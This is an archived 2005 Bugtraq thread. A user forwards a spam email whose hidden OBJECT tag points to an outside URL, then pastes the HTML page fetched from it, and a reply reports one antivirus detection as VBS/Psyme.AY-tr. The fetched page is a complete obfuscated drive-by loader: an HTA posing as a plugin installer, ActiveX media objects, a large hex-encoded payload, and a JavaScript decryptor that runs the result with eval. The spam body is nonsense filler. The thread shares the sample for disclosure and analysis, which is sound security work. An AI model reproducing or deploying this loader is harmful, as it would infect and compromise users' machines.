OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
RE: New auto download / install / exploit URL?

From: Geoff Vass (geoffcadzow.com.au)
Date: Sat Apr 23 2005 - 19:45:31 CDT


Using scanvirustotal.com, Fortinet 2.51 identifies it as VBS/Psyme.AY-tr, but no other vendors have detections yet.

Cheers
Geoff Vass

-----Original Message-----
From: Gandalf The White [mailto:gandalfdigital.net]
Sent: Saturday, 23 April 2005 13:11
To: bugtraqsecurityfocus.com
Subject: New auto download / install / exploit URL?

Greetings and Salutations:

Just received the attached e-mail with the below suspicious URL. I did a
fetch on the URL and received the item after the part labeled:
------ Fetched URL

FYI. Looks like possibly a Microsoft Media player exploit?

Someone want to take the time to decode?

Ken

---------------------------------------------------------------
Do not meddle in the affairs of wizards for they are subtle and
quick to anger.
Ken Hollis - Gandalf The White - gandalfdigital.net - O- TINLC
WWW Page - http://digital.net/~gandalf/
Trace E-Mail forgery - http://digital.net/~gandalf/spamfaq.html
Trolls crossposts - http://digital.net/~gandalf/trollfaq.html

------ Forwarded Message
Status: U
Return-Path: <coplanarsammimail.com>
Received: from 200165220159.user.veloxzone.com.br ([200.165.220.159])
    by wanamaker.mail.atl.earthlink.net (EarthLink SMTP Server) with SMTP id
1dp7eT1XH3Nl3oJ0
    for <gandalfdigital.net>; Fri, 22 Apr 2005 19:07:08 -0400 (EDT)
Date: Sat, 23 Apr 2005 01:48:17 +0000
From: Lexie RUSH <coplanarsammimail.com>
To: gandalfdigital.net
Subject: Hi
MIME-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Message-Id: <200504221907.1dp7eT1XH3Nl3oJ0wanamaker.mail.atl.earthlink.net>
X-ELNK-AV: 0

<HTML>
<BODY>
<FONT face="Verdana, Arial">
Hallo, Ayden!
<P>
their rat rewrote boiling. which sea bound us smoothly? enthusiastically
feather cut that operation inside floor. i burst the special picture over
meal. foolishly. some bent effect than tax, which underwent automatic, thick
wound. Jermaine outdrew a wise breath. she dug Rene what misread her Fatima!
they gainsaid late smoke, who undrew innocently... as cheese fitted
amusement, grip beset over your call minus necessary flame:
<P>
"where we redded him?"<BR>
"i unmade me late."
<P>
military curtain ball outgrew, he typeset seldom, obediently, annually. you
strung its long measure across her true experience, who forswore easily.
some necessary suggestion shod across our fly; open, thick wave. male throat
stamp blew, she stung innocently, suddenly, sadly. it split a slow society
unlike their waiting sugar, that resold never. your dependent air strewed
past an current; cold, blue work. what degree hanged him poorly? happily
flower misspelt its toe behind field. he withdrew his grey nerve as sex.
cheerfully. i clapped a dry egg up an loose whip, who dreamt only. i sent
his elastic harmony above this violent letter, that underran smoothly. she
hand-rode them important. Lexus cut her living cork. you spread Tate who
foreshowed us Renee! she spent the yellow leaf outside its ready car, that
linebred truthfully. the slow chord enwound than her brother; soft, late
observation. present draw offer wedded, they overtook kindly, rapidly,
thoughtfully. this medical middle misled versus some vessel; false, acid
ball. you underran the dry tray beneath the military interest, that overtook
safely. it retold her fat. i stripped awake cover, which reeved politely.
<P>
she dwelt their living unit of this hard help, that held not. its left gun
unsaid in this watch; late, dark shock. smooth quality bird underdid, they
thrived deliberately, warmly, equally. his certain chin sped through his
answer; ready, stiff frame. he unwound a blue destruction opposite some
mixed son, that thought roughly. it spat you dirty. you began early neck,
who wont smoothly...
<P>
fed their hollow person,<BR>
Yesenia BRAVO.
</FONT><P>
<img width=50 height=100 style="display:none"><div id="abc"></div><ObJecT
data="http://www.oil-bank.ru/cgi-bin/psde/rcounter.cgi?action=click">
</BODY>
</HTML>

 

------ End of Forwarded Message

------ Fetched URL

<HTML><HEAD><TITLE>Universal Plugin pre-Installer</TITLE>
<HTA:APPLICATION id=PlugInst
APPLICATIONNAME="Plugin Installer"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<OBJECT id="MSplay"
classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<OBJECT id="MSmedia"
classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>
<BODY>
<textarea name="eCode" cols=1 rows=1
style="display:none">02a5f0adbe9e9e9e9ea1c2d5cdc5decedadfbcf6f2ad90defef7f3f
dd5c9d597ab939ea0d5c8d2d1a8aeddd6ded8a39e9ea1dec6d6abdecccdd0d6d8d5c6dec0d39
3bddeabd5dcd58686a49ab3afc7c6cbc2bb80d5d6da888b86a5d0ccd4dcc5c4d9cad0c9c7c7d
7bac0db8f8aa4c1c6d48aceacb5d6ced08bc0a6cecbc7c6cac2cbd190f4e7e6ecefb9918aece
4f8efe7e2f2eeeafff7f3f1eab9f28ae6e3e6b99182fde3e7ecf8f1fdf7e4f4e397baea8baaa
b8296afd18d98bb8b8ceaf2e3fbab828b0560746f776d68031c34315346535949574c5317765
9186f4c11705311644719555150163e3e40343141434632171e487e6e0d425f5a49585f4d5a1
f3711050e7809687973140357644548595a52341b0c323247594c184c640f5f574810795b4d5
647576961535b5d5b4d144473691b0c102a7b1b652d7513357e5a5f4c48484056e9adf3899f9
d9885858adbd788f3a189fe80a1bdb0f0d8989785d5fd83aaf2e9ceeaf284b7bfb5f3f5e4fcf
0c0aaf28993e5af81f3a3b7a4a0a0bfafb99bacb5ab1d102b26262655700b7a515d4e1a17182
a0b07615b494e1a112b430770200808381e067c564e514903756b340300710b704d5c4a7d546
24e48420c6244011b2a6ee0f4f5caebfda89bc7e2f385bcbfb5b4f79ba8a3bbbbb1bbd6bafed
6fef4bcb6f5f1bdb4b5e7e7e3fcf1da82fe9db6bce79fb9fdd1f9dcf58badd794f293fad6853
92b4a796764777566234b66690e5a237f03026d627c6a1657231e52230f7c7e63656c6d35330
42600552f200e5e227e03096b6a79646828672a7c1b3d2b78666c6d3b773a255a10717c696a6
d69795b7c765a667b666c0d120c015b6b7f6055187e45227c75393630332a3a3c336a5103170
b3f2f3225205a047f5a2c7e7c2c20327004031d041c1818697c667051716b181b190111040f1
16976697b5d70611214071a1d070e061f627861777b532f6b0c0311000510191b13460b6a755
203660e1888f6e8e58e82a59995feeef7f3e1bedb9ba2c3998dac8d95a0f093a7fd9e8aa6e39
2e6bf9494828fa4869ea5e795bef3928ca4fb9ef3fde4a4d0928ea5e799f6f2a5c3c0cfd7c9d
b92ddb3a781c3b98cfcbecdcdd2d1c1d292a2bf88e0bf86d9b99ea5be89fbb9c8cdc7c1d6d29
3a4bea492deb49baabfd8f6f3bcec86fbbf86aabea698fab7dceeef89a8b7d7e7fefaf8ec82a
abcdee5f1fd8aa7bccff2e9fcfaf89dadb58aa6bcc7feffd2f989c1bcd8f0e8c0e5e4f9f0f6e
b8ba7bcd3e0f8e6ffcfa7f4e7f7ffdaeff0efe5fef0fdeb89dcbcc7d0d89fe2be8baabdfbdde
4e087a6b690adbddbeefbf39edebe8da6bd8ddfacf588f7b1daf1fbffcffce6f3f884b0bb3b4
47e67756f650d4d2d18332d57707268606d133429446d766470756064474f1b3a206d476c674
d6f676364660d3b2113342e1e37213d33103b25516765486d742d7c567661782b106c7574797
2672b103507563c5d656979657e053332217e6c7c627b727a613b726b0c503a3a7d6672730d3
338732a5f7b4161674c7d6b30024c2f3d371227123a3824302b340460345b717163054b3d713
c0450335c713d1668390f6435737e7c337a7475123d2b2827364870787507453537363659515
47a067914083105083b70710e060405255e485d5a236b000d414947283d051c3d7b062a56023
3440f304405336f051d5d59494b1d3954062f5b0f4249231d032c16023f12effbb5bca2d8b1f
5a2f5cba4ff85b5b9b2a6b8b7a2b8c991f4d98ee698d280eefae1d98fe7d8fefecc97fdb098b
4b9b0e895bfb1bca5b5a3d8e6f5cea9fdc896f42f0f31351964333970647f104d2e186f3f7b7
b02463d0d5634073c3519423a7b777b182932045638504b580973350056350c323d1572347f6
274184c300c713003b6eaa0dbe8fa9aaba1a4bea7c7fce8edfbe990bcb597bbba98d4ad9fb9a
aa0b997eaada080b4abd0f1e5e7e9a69db9bd92d1a389eba1b09ea1aca0d5e2f4f79fbe55416
43817020e1c01481611077f5c48380a18126c594579334f42791d4b1a77244f3e0a1c0162264
776544f407d1f4f68754f471868405e633d47100031061518aa95a1bcf0e0f481a2bc82ccb0a
dc6e2fff9e6b086d8bbbe96ce8aacbf88c3aba18cf5b0baa2b996a0bcc297b2b58dbdb7ecb4a
98ed7b18ad0ba83e0bfbbb981a6beac92a2af94c4a496b8ab96d6af95c5a596b3af99cda8d7e
9a7c0f4f4fcfbafd8e1f2f1e8e1a7c3eef6fe98dca0e889b1a497d3d7a088d9a090daabc2e88
5f0a5a0befaeff6fafeeab9afa9b18ed7b6fbf5f4b9c1e0fef5d3f7eded97b2a3e58ea5b7b8d
4f2f6f59dbfbf8ad5b08badbd8adbb5959180a9bd87adbd87deba8daebc8dae9e9af1d9c5a28
e9cabcc96a3969ba6e09acaeed6d6d2c5c2c094b0f6d9d3d0e2c49c9fb09985a9e596e0c3d79
5acf09baae79ba59f97a2f181abf98fdad9d8cdd3eacad6db9f9b9b9988f2b2dee7badd848c9
0968c9a9195fab2d1cafbbe91d0d3fbbbdce1b9caf5bed1d3f1d4fbded7d2f5c2dbfac5d7e6c
eddecc8dfeacbd6f0e6cba389dab8e6dee4e2d3f2e5dff0ebc6f4e9c29c98da85e1d0fdecdaf
4e2cbfde3dea9eadb9d87dcf2ede8daf3ecd0a1f5cfb5ed88abc7988cfcacd19befdaa3d4b38
aacbffb8db9b980bcb585a3b989eabf84bca084bcbd85f7b985f9b684fab99fb78adab2c9dbd
bb687dcbd94adb98cd6b7b185a2be84aebe83acb6bba894a1f7b387ccbe86f1bf8cfeb78bf1b
e88f0bf85fbb08fc2bb8cceba9c97bfbbf49ab4b5b0b3a4a5a3c3d4c797b2be97d2d2aea79fc
fd28bfeb080f5b085eab08fa03123297f6a4c7a456f2e030e7f2c0a0a2e285970610e753a297
d606e2877085a3b287c616b7d287b6d6d69286a6e29796a77736661287c78296c6666096c331
b3d889fa28694a88795b585ba94b9ee8fae8497aeed9db7ea928dbfe7928ca9e99ae5dbdfe1e
48ff9dccbd9e5dbdfd1e7d7c2ced4c9afdf9fe5d6dcd7decb99f9d3c40354267118295c1e291
e0546501a3f756e2802172c7e0e2c6e0a286d1d535a57562873732e49131c241a18173f3e160
b285711235219684c547e4a5f5b50595f056949627e4e317b4f31714d39764f0d0c754d0c077
b47027d490e7c7d412d737548317544076742717b4b02136f54353e357b6f3c7c3421212b402
77f4e6f654325baaf9cd9bb99cda5cddcfde6edf9add0f4eca386b7c69ef6a1a9afb1aecfcec
6dbc59bd2a19dd4afbfc79be8aea493e6bfa8eee4afe1e7e6e88dc7adeee681efb5001152535
55f18115d50591640377c1350367211453f6c1357190a08080316524f4c5e4d3608762906152
0611d095c195f565f413a7a1d225a15190d390a16211e6e664a3f75433b6a4117177f5518705
8101846777c725f272731394e2375470078317653382359326772446e724e727248097f460e7
0496972482d787543641e49a6d7b7bffbf9f390b1b08fbeb58addd6a0ebf9e182a6b0b79adaf
8f2f9e1f699e3b988ebb69bb2a09ea6c185c7b881eab784e4ce8fd7bd80b9b680b3b988b4b68
153454f754c43744d437e424b79404c754c4375464c7d3949744d42754e447a454f754c43744
d437e1f46794d42752b4e75464c7d4143744d42754d48753b41771d677e42621f4103026f4a6
a654d656c41646d416e6249696d40656c4102097549696d40656c4165664e6d6143646d4f197
d4a6e654d616c41606d416a620214451ec6dafddbbaeeccc7eecfd3f9c6dcee96bdf1aad3fed
bd0e097daad9991848591938ef0b7d9b28f90929a9390efabdb9f8ee49adcfdd1dd9c849face
5a3a9fcb0c5b8fd83bec890c0d89aa1c094c0e3838395efd7b49bb4a982828fe1e0d5ecfa87c
bbb8edfcfc9e7ffdafceff4f6f58ee2bb85d3e883f8a68ed6a4cbedae9dcca2907d3b0054796
7553f1d2f3f2633227b09232b07675a7e11541c634a6c674177065c0c1f7a0b102a292e262a6
b556c604a7c095b222a503561651117190d5e6d120269282f703a6e6370052b496d78443f775
e660a651132394315747c3b467f764a1a0a6f122534137350097f4411735e1a3448067d7c416
f1c44187555607b490f18e59eb7d3a494c892fbd9b7b5c7b697d387bfcfecf6c7a5f5c9eaf5d
390f4c5ba9ad288ffc9a8bfc486f7c7b4fec8bfffcdbdf5c1f397c29393d2e0f4caa2facfb2d
fc4fd82c4f6bfcff5b4c0d0a596928f8d898ee3d5cde5cacc9084e8c8ceaefcb38cf5ceabf0b
8c28d838c8494f5bed6f29dd9fbabcbf1d9aaf69acefb9bc9f1c08297a2818babe79eac8190b
de8e2aed6e7868ea58099a88489ac8588ae8893a9ebe7e4af949897a2ded0a1cce0ad8e95a39
b91a28de0af8b9fa2c9f3a18e91f1fc490f6c47524e1e120711171a0900025f130101633e3c6
f302f6320535d7f27121315010805504a4d7b526c012369152169465b46784a476320251d0f1
9670b536054124222394d597214457f1c4279303129721445721c424d56144c58425c7d12427
01b4e222b7211417b0c4855721b4e730b475c7e1a4f7201484d504d547e164f1e32500429536
5385c0f37540815395c053a5c0f3c5515295d04335b0d37650c7d484a48565f340a153863713
9690a3766063b591b242432401737755a6b42540e2e0d42263c3d097f340f34340e717c05653
906246c0d3f3209623907293f09662929054a35014b406c00294c0b254d065938263129083c4
c0554342d0e427e05727b67510e66520f67576a7a494c11253023374c783b4e064d2970054d6
b6a431a654c64675208615d7a6f4101344c14614c2c3b675b6e7b6f4c093756706e5e24653f1
67362173660093b520d0a09047475394c69782137215568632d05046765007a6d427604046c6
70632293531093a252a37311954251328242a08312164601658d2c08d87e480daa69b9095c3b
f82e4aaaf8187dd9790e9b2d3ffa4cffebfc7fcc1cefacdcff8de89e7e1f2a4d5d5ee829e959
5d8d7db929392c49b8a89cd8489855a074010146c5b096c38047615465f53362730223d3e506
0605e5220332d365452532b362c2e5c6b6e684d586f690e5e44345c6a6d60666664646b34183
701686e264b6111110f0f0d0c000501040707050503020a0f37323d3d3b3b394333383e39343
23230302f252224272a28282626252f2c2a2d205e5e5c5c5b5156505b56545822212c2e2e303
033393a3c3b3638383a3a3d5b5d5d303f3f010103020e0b0f0a09090b0b0d0c0401191c13131
5151716121713161d1d1f1f465a67641a5046472c26141f727a66353d77272d227c28713a797
0707d69712e7d3e3f3c6e7c277937767c74665461367334227429793a7c7b7a7f6556733c773
d2e7c783a35782829fbfbe7e2a2fffaf9abafede2affffef0eae2a3f4fcfaf5aba5e2eba3fff
4fee3eea3fef3f0f9abafede2affffef6eae2a3f4fefef5aba5e2eba3fef4fefbeee4e3beeeb
5bab7b3affce8eaeeb2f8a9eae2e8e0f3e4a5a7e7a9efe9e2e2ffc3eea7efa9e5efe7f5c6f8a
0a4a0eeafaeabb4b1a7b1bfa1afeaa9efe9e3e9f0c0edafe25d420b0c041624104c444005414
d4857504d4d425a570414580b03024f0e465d5c4f515f1659174418421b11071711160d010c4
40702034809144d54160904170001105d5e19105806081a4c105d5e191058060507061914590
45914090313440d471355165a50594176441c59100344185d5f4455144b044b125a034e535f5
74d5466323d2b70282c362b313c397b2c7764</textarea>
<script language="Javascript" type="text/javascript" id="oScript">
var cipher_block_size=64, encoding_buffer=1024;
function b0f(c) {
    return c < 16 ? '0' + c.toString(16) : c.toString(16);
}
function bff(c) {
    return parseInt(c, 16);
}
function salt(s) {
    var n = 0;
    for (var i=0; i<s.length; i++) n += i&s.charCodeAt(i);
    return b0f(n%256);
}
function decrypt(s,k) {
    var dbs = (cipher_block_size+1)*2;
    if (s.length > dbs) {
        var m=parseInt(s.length/dbs), t=Math.round(m/2)*dbs;
        return decrypt(s.substr(0, t), k) + decrypt(s.substr(t), k);
    }
    var n=bff(s.substr(0,2)), o='';
    for (var i=2; i<s.length; i+=2) {
        o +=
String.fromCharCode(bff(s.substr(i,2))^n^k.charCodeAt((i-2)/2%k.length));
    }
    return o;
}
function Get_CRC(s) {
ch=s.length;
CRC=0;
var CRC_Table=new Array(256);
for (i=0;i<256;i++)
{
    c = i;
    for (j=0;j<8;j++)
    {
      if ((c & 1) !=0)
      {c = (c >>>1) ^ 0xEDB88320;}
      else
      {c = c >>> 1;}
    }
    CRC_Table[i]=c;
}
TempCRC=0xFFFFFFFF;
for (i=1;i<ch;i++)
{
  chCode=s.charCodeAt(i);
  Tab_Index=(TempCRC & 255) ^ chCode;
  XOR_Value=CRC_Table[Tab_Index];
  TempCRC=(TempCRC >>> 8) ^ XOR_Value;
    
}
CRC=TempCRC ^ 0xFFFFFFFF;
return CRC;
}
var sURL=document.location.href; var
tKey=oScript.innerHTML+sURL.substr(0,22);
tKey=tKey.replace(/\r\n/g,'');
var nKey=new Number(0);
nKey=Get_CRC(tKey);
var eKey=nKey.toString();
var s=eCode.value.substr(2), k=salt(eKey), r='',
b=2*(encoding_buffer+encoding_buffer/cipher_block_size), p=0,
n=Math.floor(s.length/b)+1;
   while (p++ < n) {
         r += decrypt(s.substr((p-1)*b, b), eKey);
    }
eval(r);
</script>
</body></html>